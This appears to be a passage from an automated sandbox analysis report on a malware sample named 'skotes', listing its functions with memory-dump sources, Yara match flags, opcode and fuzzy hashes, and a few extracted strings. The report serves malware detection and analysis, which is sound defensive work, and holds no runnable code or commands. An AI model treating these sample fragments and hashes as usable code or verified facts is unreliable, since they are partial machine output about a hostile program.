                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: a83ddecbaf3902828a2b7deaa69de54276efea35650a7775f3e1b492282edd1b
                                                  • Instruction ID: 947babc874f07f80f9aafaacbed5773231e6deae8818dd22613e86091969efa8
                                                  • Opcode Fuzzy Hash: a83ddecbaf3902828a2b7deaa69de54276efea35650a7775f3e1b492282edd1b
                                                  • Instruction Fuzzy Hash: F6F0A471A00615EBCB15BB789D03B1EBB74EB06760F804758E825673D5FB705A1487F2
                                                  Function 053E0D01 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1579 53e0d01-53e0d9c 1585 53e0da2-53e0de3 1579->1585
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7f2881a66ff95bb663feb0d94530b7b5ea0aab313dee7181f64d3437b2a8891f
                                                  • Instruction ID: f5ac0c564a2e1d0314259b5b459ac03c0fbd22034b01dd123fbfe0e3805e2921
                                                  • Opcode Fuzzy Hash: 7f2881a66ff95bb663feb0d94530b7b5ea0aab313dee7181f64d3437b2a8891f
                                                  • Instruction Fuzzy Hash: 45F017FF14C121BD7145C1866B68AFB67EEE1C1B303308827F487C6981D6E45D49A632
                                                  Function 053E0D34 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4c9911472f3fb4725e714e025abb63d008ec2d17e3c50b219b6ad8df86e118d
                                                  • Instruction ID: fe6bf68571545782b90ae92d9f6595c48e7983099b6360617e78235d85d81bfd
                                                  • Opcode Fuzzy Hash: a4c9911472f3fb4725e714e025abb63d008ec2d17e3c50b219b6ad8df86e118d
                                                  • Instruction Fuzzy Hash: 62F015FF14C034BC7055C0823B28AFB67AEE0C0A303B08827F446C1881D2D95A4E2672
                                                  Function 053E0DBA Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5d8d0fc18f6e4867a563e6c7fcfc5bf3c0f28d57214e96fefe6f0ebab5b8118
                                                  • Instruction ID: 467f4550b515e04eb3df03c215d5a8ab236df98923220524e2650a7d4b9bf4c5
                                                  • Opcode Fuzzy Hash: e5d8d0fc18f6e4867a563e6c7fcfc5bf3c0f28d57214e96fefe6f0ebab5b8118
                                                  • Instruction Fuzzy Hash: B0F082BB10C161AEF515C1917E2DBFB67AEE6C17347309927F483C1482D2D5514E5232
                                                  Function 053E0D3D Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e55d8d920b248ec9644d28f379e6ffe70f1fabe5ec2097c5bb56edb61dfbd1d5
                                                  • Instruction ID: 8749b66b08d8835378fa0610b3eb12f207b631f1519a2dca43ec292b558d364f
                                                  • Opcode Fuzzy Hash: e55d8d920b248ec9644d28f379e6ffe70f1fabe5ec2097c5bb56edb61dfbd1d5
                                                  • Instruction Fuzzy Hash: B3F0C9FF15C135BCB056C5823B28AFB57ADE0D1734370C827F442C1882D6C96A5E6672
                                                  Function 053E0D57 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5f85a5ddcd5bd546b3d01ad1e3f9b386383d9ab88daa409532d30efaf0594e2
                                                  • Instruction ID: 45cb70a9fb07257ec8f1347ce39778062dd8792cac48d7752e2e029a9755f91f
                                                  • Opcode Fuzzy Hash: c5f85a5ddcd5bd546b3d01ad1e3f9b386383d9ab88daa409532d30efaf0594e2
                                                  • Instruction Fuzzy Hash: 6CE06DBF10C460AEB052C1827E29AFBA3AEE5D0B307308827F843C2582D2D9154E6132
                                                  Function 053E0D88 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 168a9fc28f4538f3773a943bc5029c7bced327a2be61ab581ef1a9f4ed1b56d1
                                                  • Instruction ID: d46b764005183d38b68383c3424d3edc7842f0136f5349411079fef896b0d1c6
                                                  • Opcode Fuzzy Hash: 168a9fc28f4538f3773a943bc5029c7bced327a2be61ab581ef1a9f4ed1b56d1
                                                  • Instruction Fuzzy Hash: 05D02B7644D060EE5151C541E80C9777BF8F681228330449BF58186481D6A41128F372

                                                  Non-executed Functions

                                                  Function 00D6E530 Relevance: 14.7, Strings: 11, Instructions: 998COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                  • API String ID: 0-2571795437
                                                  • Opcode ID: ae4142d44967194096bb55c8932e4e39d0ff93def23a8384e6c3647e67c51957
                                                  • Instruction ID: d7fec8b1ae4b4ad8926e239bde67a2547dfecee12d697c08b94bb1eb6eb4fb56
                                                  • Opcode Fuzzy Hash: ae4142d44967194096bb55c8932e4e39d0ff93def23a8384e6c3647e67c51957
                                                  • Instruction Fuzzy Hash: E082C3709042889BEF14EF68C9497DE7FB5EB05304F508599E809673C2E7759A88CBF2
                                                  Function 00DA31A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: bf35bd7ec1f8d96d4bb7911a3cf8b7fc872dc44106fbd25390ea4666dda74f0a
                                                  • Instruction ID: 15260795e3d8da42ab1c4832ef6c2723935a73f89931f00901674ed4563c90bc
                                                  • Opcode Fuzzy Hash: bf35bd7ec1f8d96d4bb7911a3cf8b7fc872dc44106fbd25390ea4666dda74f0a
                                                  • Instruction Fuzzy Hash: A2C24F71E046288FDF25CE28DD407E9B7B6EB89315F1841EAE44DE7240E775AE818F60
                                                  Function 00DA2D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                                  • Instruction ID: dca450b38ae12a5102c2e64589b16aa623bf9edff4baf74195811914f105b945
                                                  • Opcode Fuzzy Hash: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                                  • Instruction Fuzzy Hash: 41F13F71E002199FDF14CFA9C8806ADFBB2FF49314F198269E919A7344D731AE41CBA4
                                                  Function 00D7CBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00D7CF52,?,?,?,?,00D7CF87,?,?,?,?,?,?,00D7C4FD,?,00000001), ref: 00D7CC03
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$FilePreciseSystem
                                                  • String ID:
                                                  • API String ID: 1802150274-0
                                                  • Opcode ID: 4e6760ed1096268db362bf76514f75d1b9618cdbf8bcc199d97c50fc3d30381d
                                                  • Instruction ID: 0055955766ff4464d91b96d46c8f98fb1f7d1bb561ae47a24db7cf6e081a23be
                                                  • Opcode Fuzzy Hash: 4e6760ed1096268db362bf76514f75d1b9618cdbf8bcc199d97c50fc3d30381d
                                                  • Instruction Fuzzy Hash: 58D02232612238EB8B1A2B94FC08CADBBA88B00B603045215ED0D93224CE10EDC08BF4
                                                  Function 00D97F36 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                  • Instruction ID: 352dbbb8e1d4db2af8389c1a48d9e5e4672552d5efa776af032b59d3b33d735a
                                                  • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                  • Instruction Fuzzy Hash: DC516B306187445ADF384E2888967FE679AAF13B00F1C0519E487F7292CE62DD4DA375
                                                  Function 00D64DE0 Relevance: .7, Instructions: 701COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 066cac46bd10752de9288103684a0fdcea2f99404352cad82e6b501f5488259b
                                                  • Instruction ID: 8ede3c8abb72d36ccc170e8b3605047507b2bcb66bf3a153a9ea99ce1db5ebcc
                                                  • Opcode Fuzzy Hash: 066cac46bd10752de9288103684a0fdcea2f99404352cad82e6b501f5488259b
                                                  • Instruction Fuzzy Hash: 142261B3F515144BDB0CCB5DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159644
                                                  Function 00DA7049 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57014f049ed541a3c9b167e5716a71940e5b9ff4e298a3cb8128f61d03316137
                                                  • Instruction ID: 8450353da52cf5ac52e2e1df3fbc1143712af35882910919afd95f75895d4622
                                                  • Opcode Fuzzy Hash: 57014f049ed541a3c9b167e5716a71940e5b9ff4e298a3cb8128f61d03316137
                                                  • Instruction Fuzzy Hash: 84B14C31614605DFDB18CF28C886B657BE0FF46364F298658E8D9CF2A1C335E992CB54
                                                  Function 00D64B30 Relevance: .2, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a206d52fa913c7161ed381a9212eedb5bb86cb4ce16f42bf61ad81c88c1232c
                                                  • Instruction ID: 07db605f602e5a45ca9e27ce672efb5e7034e6ddc50fb59ab69096645352c276
                                                  • Opcode Fuzzy Hash: 8a206d52fa913c7161ed381a9212eedb5bb86cb4ce16f42bf61ad81c88c1232c
                                                  • Instruction Fuzzy Hash: 3981EC70E002468FEB15CF68D890BEEBBF5FB1A300F190269D851A7352C7359945CBB0
                                                  Function 00D7D3E2 Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D624BE
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ___std_exception_copy
                                                  • String ID:
                                                  • API String ID: 2659868963-0
                                                  • Opcode ID: 37439dc5b40f57bf1b736cf311d05dbc0e93d8b415b8bcdd17a904ab299e2eb0
                                                  • Instruction ID: a00c4966379bf15db213c5b30d53e9368b4fb58362b065dfa24f9f5555fc6bb9
                                                  • Opcode Fuzzy Hash: 37439dc5b40f57bf1b736cf311d05dbc0e93d8b415b8bcdd17a904ab299e2eb0
                                                  • Instruction Fuzzy Hash: 9051B0B19057078BDB16CF59D885AADB7F2FF44314F28856AE409EB354E730A940CBB0
                                                  Function 00DA78BB Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1934eaa9b604135fb573749e9bba6156e948bda675fe0c316d9445e1f307d16d
                                                  • Instruction ID: c102b49a7805406e648664bdbad3fbd2a245feb4cea4d219404cd60b3f9703ca
